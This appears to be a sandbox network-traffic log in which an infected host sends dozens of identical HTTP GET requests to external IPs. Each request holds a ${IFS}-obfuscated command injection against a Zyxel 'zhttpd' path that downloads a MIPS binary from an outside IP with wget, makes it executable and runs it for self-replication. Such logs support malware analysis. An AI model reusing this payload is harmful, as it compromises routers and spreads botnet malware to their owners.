                                            Feb 2, 2024 06:21:21.839251995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6924192.168.2.154729637.154.151.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.839293003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6925192.168.2.156099294.186.236.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.839323997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6926192.168.2.1543868205.129.138.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.839354992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6927192.168.2.1548630206.178.165.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.817867994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6928192.168.2.1551814100.179.156.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.817923069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6929192.168.2.155930898.55.40.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818005085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6930192.168.2.1535438157.34.66.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818033934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6931192.168.2.1541026191.223.239.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818093061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6932192.168.2.1551068146.8.182.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818115950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6933192.168.2.153459861.152.242.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818147898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6934192.168.2.1548176194.222.248.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818186045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6935192.168.2.1560214129.60.33.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818234921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6936192.168.2.1558392196.147.181.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818259001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6937192.168.2.1559174178.142.52.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818294048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6938192.168.2.1543960164.139.135.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818331957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6939192.168.2.155879420.111.221.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818382978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6940192.168.2.154381636.36.184.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818408012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6941192.168.2.1534002113.42.173.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818439007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6942192.168.2.155423669.131.167.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818464041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6943192.168.2.154402847.134.80.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818487883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6944192.168.2.1553032117.136.71.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818521023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6945192.168.2.1556326208.26.76.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818547964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6946192.168.2.153826664.232.159.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818609953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6947192.168.2.1535610151.127.174.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818622112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6948192.168.2.1556324116.15.112.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818645000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6949192.168.2.1535260163.120.99.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818706989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6950192.168.2.153746061.239.186.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818756104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6951192.168.2.1541478220.112.28.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818787098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6952192.168.2.1536860195.183.81.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818849087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6953192.168.2.1556100185.172.92.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818849087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6954192.168.2.154964439.177.254.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818883896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6955192.168.2.1549964113.83.136.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818919897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6956192.168.2.1555818213.99.161.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818948030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6957192.168.2.1538624148.184.5.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.818988085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6958192.168.2.1558080101.221.15.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819022894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6959192.168.2.1548052197.61.163.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819046974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6960192.168.2.1547616119.252.19.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819080114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6961192.168.2.154841095.53.237.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819101095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6962192.168.2.1538894132.91.213.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819142103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6963192.168.2.154571298.167.34.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819189072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6964192.168.2.155829246.185.109.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819219112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6965192.168.2.1551220222.165.141.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819242954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6966192.168.2.1554942176.72.78.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819273949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6967192.168.2.1540662213.107.191.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819304943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6968192.168.2.1557794180.176.89.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819340944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6969192.168.2.155119273.82.250.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819371939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6970192.168.2.1537886170.205.249.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819412947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6971192.168.2.1533978134.64.124.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819423914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6972192.168.2.154614291.184.197.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819457054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6973192.168.2.1541962211.70.230.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819500923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6974192.168.2.155314075.105.212.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819516897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6975192.168.2.1541638124.36.27.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819569111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6976192.168.2.1548976193.22.123.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819607019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6977192.168.2.1536390190.166.238.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819631100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6978192.168.2.155360449.254.255.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819694042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6979192.168.2.1549190188.183.149.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819710016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6980192.168.2.1555338142.209.19.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819765091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6981192.168.2.155611645.205.105.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819792032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6982192.168.2.155083632.125.88.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819829941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6983192.168.2.1537324163.52.216.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819874048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6984192.168.2.155137485.128.228.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819896936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6985192.168.2.156092225.30.52.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819915056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6986192.168.2.153909258.224.208.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.819952965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6987192.168.2.1558046183.163.87.186443
                                            TimestampBytes transferredDirectionData
